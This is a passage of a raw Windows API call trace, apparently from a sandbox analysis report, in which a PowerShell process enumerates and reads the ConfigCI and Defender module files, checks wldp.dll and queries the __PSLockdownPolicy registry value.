0x3b [0332.158] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\configci\\*"), lpFindFileData=0x1b62e3f0 | out: lpFindFileData=0x1b62e3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d6170d, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8996c0 [0332.158] FindNextFileW (in: hFindFile=0x1a8996c0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d6170d, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0332.158] FindNextFileW (in: hFindFile=0x1a8996c0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26c659cb, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf74a5c5e, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x26c659cb, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x337, dwReserved0=0x0, dwReserved1=0x0, cFileName="ConfigCI.psd1", cAlternateFileName="")) returned 1 [0332.158] FindNextFileW (in: hFindFile=0x1a8996c0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x6d90540, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x6d90540, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0332.158] FindNextFileW (in: hFindFile=0x1a8996c0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0332.158] FindClose (in: hFindFile=0x1a8996c0 | out: hFindFile=0x1a8996c0) returned 1 [0332.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e348) returned 1 [0332.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e568) returned 1 [0332.159] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI\\ConfigCI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\configci\\configci.psd1")) returned 0x20 [0332.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI\\ConfigCI.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0332.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI\\ConfigCI.psd1", nBufferLength=0x4a, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI\\ConfigCI.psd1", lpFilePart=0x0) returned 0x49 [0332.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI\\ConfigCI.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0332.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI\\ConfigCI.psd1", nBufferLength=0x4a, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI\\ConfigCI.psd1", lpFilePart=0x0) returned 0x49 [0332.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e418) returned 1 [0332.159] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ConfigCI\\ConfigCI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\configci\\configci.psd1"), fInfoLevelId=0x0, lpFileInformation=0x240d8f8 | out: lpFileInformation=0x240d8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26c659cb, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x3cdaa881, ftLastAccessTime.dwHighDateTime=0x1d94216, ftLastWriteTime.dwLowDateTime=0x26c659cb, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x337)) returned 1 [0332.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e3c8) returned 1 [0332.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e648) returned 1 [0332.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3c [0332.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender", nBufferLength=0x3c, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender", lpFilePart=0x0) returned 0x3b [0332.160] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\*"), lpFindFileData=0x1b62e3f0 | out: lpFindFileData=0x1b62e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25d8796d, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xbe00174, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a89a980 [0332.160] FindNextFileW (in: hFindFile=0x1a89a980, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25d8796d, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xbe00174, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0332.160] FindNextFileW (in: hFindFile=0x1a89a980, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26331504, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x362d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender.psd1", cAlternateFileName="")) returned 1 [0332.160] FindNextFileW (in: hFindFile=0x1a89a980, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x26e030ab, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x37b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpComputerStatus.cdxml", cAlternateFileName="")) returned 1 [0332.161] FindNextFileW (in: hFindFile=0x1a89a980, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2a510b9a, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0xf992, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpPreference.cdxml", cAlternateFileName="")) returned 1 [0332.161] FindNextFileW (in: hFindFile=0x1a89a980, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2da5757f, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3ce6, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpScan.cdxml", cAlternateFileName="")) returned 1 [0332.161] FindNextFileW (in: hFindFile=0x1a89a980, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2de5d47a, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3cd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpSignature.cdxml", cAlternateFileName="")) returned 1 [0332.161] FindNextFileW (in: hFindFile=0x1a89a980, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2c574645, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreat.cdxml", cAlternateFileName="")) returned 1 [0332.161] FindNextFileW (in: hFindFile=0x1a89a980, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2cbbd328, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x396e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatCatalog.cdxml", cAlternateFileName="")) returned 1 [0332.161] FindNextFileW (in: hFindFile=0x1a89a980, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2d415197, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3966, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatDetection.cdxml", cAlternateFileName="")) returned 1 [0332.161] FindNextFileW (in: hFindFile=0x1a89a980, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2df8e63a, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3889, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpWDOScan.cdxml", cAlternateFileName="")) returned 1 [0332.161] FindNextFileW (in: hFindFile=0x1a89a980, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2df8e63a, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3889, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpWDOScan.cdxml", cAlternateFileName="")) returned 0 [0332.161] FindClose (in: hFindFile=0x1a89a980 | out: hFindFile=0x1a89a980) returned 1 [0332.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e348) returned 1 [0332.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e568) returned 1 [0332.161] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1")) returned 0x20 [0332.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0332.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x4a, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0332.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0332.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x4a, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0332.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e418) returned 1 [0332.162] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1"), fInfoLevelId=0x0, lpFileInformation=0x240e350 | out: lpFileInformation=0x240e350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2667654b, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x362d)) returned 1 [0332.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e3c8) returned 1 [0332.164] CoCreateGuid (in: pguid=0x1b62e6d8 | out: pguid=0x1b62e6d8*(Data1=0x15173d77, Data2=0xed8b, Data3=0x44bf, Data4=([0]=0x89, [1]=0x6a, [2]=0xf3, [3]=0x3f, [4]=0xc0, [5]=0x3e, [6]=0x76, [7]=0x87))) returned 0x0 [0332.184] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x794 [0332.185] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x79c [0332.185] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7b8 [0332.187] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7bc [0332.187] SetEvent (hEvent=0x7bc) returned 1 [0332.187] SetEvent (hEvent=0x794) returned 1 [0332.187] SetEvent (hEvent=0x79c) returned 1 [0332.187] SetEvent (hEvent=0x7b8) returned 1 [0332.191] AmsiCloseSession () returned 0x7fffb444c2b0 [0332.192] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7c0 [0332.192] SetThreadUILanguage (LangId=0x0) returned 0x409 [0332.310] EtwEventActivityIdControl () returned 0x0 [0332.310] EtwEventActivityIdControl () returned 0x0 [0332.310] EtwEventActivityIdControl () returned 0x0 [0332.374] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1")) returned 0x20 [0332.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0332.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x4a, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0332.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62dc78) returned 1 [0332.376] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b62dfa0 | out: lpFileInformation=0x1b62dfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2667654b, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x362d)) returned 1 [0332.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62dc28) returned 1 [0332.377] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1")) returned 0x20 [0332.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0332.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x4a, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0332.502] CoTaskMemAlloc (cb=0x20c) returned 0x1a8656e0 [0332.502] GetSystemDirectoryW (in: lpBuffer=0x1a8656e0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0332.502] CoTaskMemFree (pv=0x1a8656e0) [0332.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0332.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0332.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62d808) returned 1 [0332.502] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b62db30 | out: lpFileInformation=0x1b62db30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x46178940, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0332.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62d7b8) returned 1 [0332.503] GetSystemInfo (in: lpSystemInfo=0x1b62dbb0 | out: lpSystemInfo=0x1b62dbb0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0332.503] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62dab8 | out: phkResult=0x1b62dab8*=0x7c4) returned 0x0 [0332.503] RegQueryValueExW (in: hKey=0x7c4, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b62db08, lpData=0x0, lpcbData=0x1b62db00*=0x0 | out: lpType=0x1b62db08*=0x0, lpData=0x0, lpcbData=0x1b62db00*=0x0) returned 0x2 [0332.504] RegCloseKey (hKey=0x7c4) returned 0x0 [0332.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0332.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x4a, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0332.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62da28) returned 1 [0332.520] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7c4 [0332.520] GetFileType (hFile=0x7c4) returned 0x1 [0332.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62d998) returned 1 [0332.520] GetFileType (hFile=0x7c4) returned 0x1 [0332.520] GetACP () returned 0x4e4 [0332.542] SetFilePointer (in: hFile=0x7c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62d9b8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62d9b8*=0) returned 0x0 [0332.542] ReadFile (in: hFile=0x7c4, lpBuffer=0x244ca08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62da38, lpOverlapped=0x0 | out: lpBuffer=0x244ca08*, lpNumberOfBytesRead=0x1b62da38*=0x1000, lpOverlapped=0x0) returned 1 [0332.543] SetFilePointer (in: hFile=0x7c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62d9b8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62d9b8*=0) returned 0x1000 [0332.543] ReadFile (in: hFile=0x7c4, lpBuffer=0x244ca08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62da38, lpOverlapped=0x0 | out: lpBuffer=0x244ca08*, lpNumberOfBytesRead=0x1b62da38*=0x1000, lpOverlapped=0x0) returned 1 [0332.545] SetFilePointer (in: hFile=0x7c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62d9b8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62d9b8*=0) returned 0x2000 [0332.545] ReadFile (in: hFile=0x7c4, lpBuffer=0x244ca08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62da38, lpOverlapped=0x0 | out: lpBuffer=0x244ca08*, lpNumberOfBytesRead=0x1b62da38*=0x1000, lpOverlapped=0x0) returned 1 [0332.546] SetFilePointer (in: hFile=0x7c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62d9b8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62d9b8*=0) returned 0x3000 [0332.546] ReadFile (in: hFile=0x7c4, lpBuffer=0x244ca08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62da38, lpOverlapped=0x0 | out: lpBuffer=0x244ca08*, lpNumberOfBytesRead=0x1b62da38*=0x62d, lpOverlapped=0x0) returned 1 [0332.546] SetFilePointer (in: hFile=0x7c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62d9b8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62d9b8*=0) returned 0x362d [0332.546] ReadFile (in: hFile=0x7c4, lpBuffer=0x244bf9d, nNumberOfBytesToRead=0x1d3, lpNumberOfBytesRead=0x1b62da38, lpOverlapped=0x0 | out: lpBuffer=0x244bf9d*, lpNumberOfBytesRead=0x1b62da38*=0x0, lpOverlapped=0x0) returned 1 [0332.547] SetFilePointer (in: hFile=0x7c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62d9b8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62d9b8*=0) returned 0x362d [0332.547] ReadFile (in: hFile=0x7c4, lpBuffer=0x244ca08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62da38, lpOverlapped=0x0 | out: lpBuffer=0x244ca08*, lpNumberOfBytesRead=0x1b62da38*=0x0, lpOverlapped=0x0) returned 1 [0332.548] CoTaskMemAlloc (cb=0x20c) returned 0x1a865b20 [0332.548] GetSystemDirectoryW (in: lpBuffer=0x1a865b20, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0332.548] CoTaskMemFree (pv=0x1a865b20) [0332.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0332.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0332.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62d6f8) returned 1 [0332.548] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b62da20 